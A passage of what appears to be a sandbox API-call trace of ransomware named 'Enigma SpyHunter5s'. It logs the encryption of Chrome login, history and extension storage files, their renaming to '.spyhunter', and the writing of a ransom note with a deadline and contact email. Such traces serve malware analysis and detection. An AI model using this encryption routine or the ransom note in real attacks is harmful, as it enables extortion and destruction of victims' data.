pbData=0x31f110*, pdwDataLen=0x57eb88*=0x30) returned 1 [0156.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0156.568] StrStrW (lpFirst="Login Data-journal", lpSrch=".txt") returned 0x0 [0156.569] GetProcessHeap () returned 0x2c0000 [0156.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.569] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb4c*=0x0, lpOverlapped=0x0) returned 1 [0156.569] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.569] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb4c*=0x0, lpOverlapped=0x0) returned 1 [0156.569] GetProcessHeap () returned 0x2c0000 [0156.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.569] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.569] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x57eb8c*, lpNumberOfBytesWritten=0x57eb4c*=0x4, lpOverlapped=0x0) returned 1 [0156.570] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb4c*=0x30, lpOverlapped=0x0) returned 1 [0156.571] CloseHandle (hObject=0xa0) returned 1 [0156.571] GetProcessHeap () returned 0x2c0000 [0156.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.571] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.spyhunter") returned 108 [0156.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal.spyhunter")) returned 1 [0156.572] GetProcessHeap () returned 0x2c0000 [0156.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.572] GetProcessHeap () returned 0x2c0000 [0156.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.572] GetProcessHeap () returned 0x2c0000 [0156.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29f48 | out: hHeap=0x2c0000) returned 1 [0156.572] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb88 | out: pbBuffer=0x57eb88) returned 1 [0156.572] GetProcessHeap () returned 0x2c0000 [0156.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.572] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb80*=0x30) returned 1 [0156.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.573] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0156.573] StrStrW (lpFirst="Login Data", lpSrch=".txt") returned 0x0 [0156.573] GetProcessHeap () returned 0x2c0000 [0156.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.573] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb44*=0x2800, lpOverlapped=0x0) returned 1 [0156.574] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.574] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb44*=0x2800, lpOverlapped=0x0) returned 1 [0156.574] GetProcessHeap () returned 0x2c0000 [0156.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.574] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.574] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x57eb84*, lpNumberOfBytesWritten=0x57eb44*=0x4, lpOverlapped=0x0) returned 1 [0156.575] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb44*=0x30, lpOverlapped=0x0) returned 1 [0156.575] CloseHandle (hObject=0xa0) returned 1 [0156.575] GetProcessHeap () returned 0x2c0000 [0156.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.575] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.spyhunter") returned 100 [0156.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data.spyhunter")) returned 1 [0156.576] GetProcessHeap () returned 0x2c0000 [0156.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.576] GetProcessHeap () returned 0x2c0000 [0156.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.576] GetProcessHeap () returned 0x2c0000 [0156.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44a28 | out: hHeap=0x2c0000) returned 1 [0156.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.577] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.578] WriteFile (in: hFile=0xa0, lpBuffer=0x57eabb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x57eabb*, lpNumberOfBytesWritten=0x57ebe4*=0x127, lpOverlapped=0x0) returned 1 [0156.578] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.578] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebe4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebe4*=0x2ac, lpOverlapped=0x0) returned 1 [0156.578] CloseHandle (hObject=0xa0) returned 1 [0156.579] GetProcessHeap () returned 0x2c0000 [0156.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a8e8 | out: hHeap=0x2c0000) returned 1 [0156.579] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb80 | out: pbBuffer=0x57eb80) returned 1 [0156.579] GetProcessHeap () returned 0x2c0000 [0156.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.579] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb78*=0x30) returned 1 [0156.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.579] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0156.579] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".txt") returned 0x0 [0156.579] GetProcessHeap () returned 0x2c0000 [0156.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.579] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb3c*=0x0, lpOverlapped=0x0) returned 1 [0156.580] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.580] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb3c*=0x0, lpOverlapped=0x0) returned 1 [0156.580] GetProcessHeap () returned 0x2c0000 [0156.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.580] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.580] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x57eb7c*, lpNumberOfBytesWritten=0x57eb3c*=0x4, lpOverlapped=0x0) returned 1 [0156.581] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb3c*=0x30, lpOverlapped=0x0) returned 1 [0156.581] CloseHandle (hObject=0xa0) returned 1 [0156.581] GetProcessHeap () returned 0x2c0000 [0156.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.581] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.spyhunter") returned 176 [0156.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.spyhunter")) returned 1 [0156.582] GetProcessHeap () returned 0x2c0000 [0156.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.582] GetProcessHeap () returned 0x2c0000 [0156.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.582] GetProcessHeap () returned 0x2c0000 [0156.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe56d0 | out: hHeap=0x2c0000) returned 1 [0156.582] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb80 | out: pbBuffer=0x57eb80) returned 1 [0156.582] GetProcessHeap () returned 0x2c0000 [0156.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.582] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb78*=0x30) returned 1 [0156.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0156.583] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".txt") returned 0x0 [0156.583] GetProcessHeap () returned 0x2c0000 [0156.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.583] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb3c*=0x2800, lpOverlapped=0x0) returned 1 [0156.621] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.621] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb3c*=0x2800, lpOverlapped=0x0) returned 1 [0156.621] GetProcessHeap () returned 0x2c0000 [0156.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.621] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.622] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x57eb7c*, lpNumberOfBytesWritten=0x57eb3c*=0x4, lpOverlapped=0x0) returned 1 [0156.622] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb3c*=0x30, lpOverlapped=0x0) returned 1 [0156.622] CloseHandle (hObject=0xa0) returned 1 [0156.622] GetProcessHeap () returned 0x2c0000 [0156.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.622] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.spyhunter") returned 168 [0156.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.spyhunter")) returned 1 [0156.623] GetProcessHeap () returned 0x2c0000 [0156.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.623] GetProcessHeap () returned 0x2c0000 [0156.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.623] GetProcessHeap () returned 0x2c0000 [0156.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f225f8 | out: hHeap=0x2c0000) returned 1 [0156.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb78 | out: pbBuffer=0x57eb78) returned 1 [0156.623] GetProcessHeap () returned 0x2c0000 [0156.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb70*=0x30) returned 1 [0156.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.630] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal") returned 95 [0156.630] StrStrW (lpFirst="History-journal", lpSrch=".txt") returned 0x0 [0156.630] GetProcessHeap () returned 0x2c0000 [0156.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.630] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb34*=0x0, lpOverlapped=0x0) returned 1 [0156.630] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.630] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb34*=0x0, lpOverlapped=0x0) returned 1 [0156.630] GetProcessHeap () returned 0x2c0000 [0156.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.630] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.630] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x57eb74*, lpNumberOfBytesWritten=0x57eb34*=0x4, lpOverlapped=0x0) returned 1 [0156.631] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb34*=0x30, lpOverlapped=0x0) returned 1 [0156.631] CloseHandle (hObject=0x9c) returned 1 [0156.631] GetProcessHeap () returned 0x2c0000 [0156.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.631] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.spyhunter") returned 105 [0156.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history-journal.spyhunter")) returned 1 [0156.632] GetProcessHeap () returned 0x2c0000 [0156.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.632] GetProcessHeap () returned 0x2c0000 [0156.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.632] GetProcessHeap () returned 0x2c0000 [0156.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b568 | out: hHeap=0x2c0000) returned 1 [0156.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb78 | out: pbBuffer=0x57eb78) returned 1 [0156.632] GetProcessHeap () returned 0x2c0000 [0156.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb70*=0x30) returned 1 [0156.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico") returned 98 [0156.633] StrStrW (lpFirst="Google Profile.ico", lpSrch=".txt") returned 0x0 